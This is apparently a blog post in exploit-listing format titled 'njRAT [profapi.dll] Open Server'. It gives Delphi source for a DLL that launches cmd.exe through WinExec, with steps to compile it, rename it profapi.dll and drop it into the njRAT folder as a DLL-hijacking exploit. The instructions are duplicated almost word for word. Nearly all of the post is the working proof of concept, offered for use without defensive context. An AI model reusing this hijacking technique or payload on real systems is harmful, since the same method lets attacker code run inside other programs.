Filename | njRAT [profapi.dll] Open Server |
Permission | rw-r--r-- |
Author | Unknown |
Date and Time | 8:57 AM |
Label | |
Action |
# Exploit : njRAT [profapi.dll] Open Server
# Type : DLL Hjack
Open Delphi > DLL Wizard
Code Exploit :
==========================================================
library Project2; // Library
uses
Windows; // Used
begin
Winexec(PAnsichar('C:\windows\system32\cmd.exe'),sw_show); // Run Cmd.exe
end.
==========================================================
Save As > [Ctrl + F9]
Copy Dll > Change Name in [profapi.dll]
Copy in folder njRAT
# Type : DLL Hjack
Open Delphi > DLL Wizard
Code Exploit :
==========================================================
library Project2; // Library
uses
Windows; // Used
begin
Winexec(PAnsichar('C:\windows\system32\cmd.exe'),sw_show); // Run Cmd.exe
end.
==========================================================
Copy Dll > Change Name in [profapi.dll]
Copy in folder njRAT
0 comments:
Post a Comment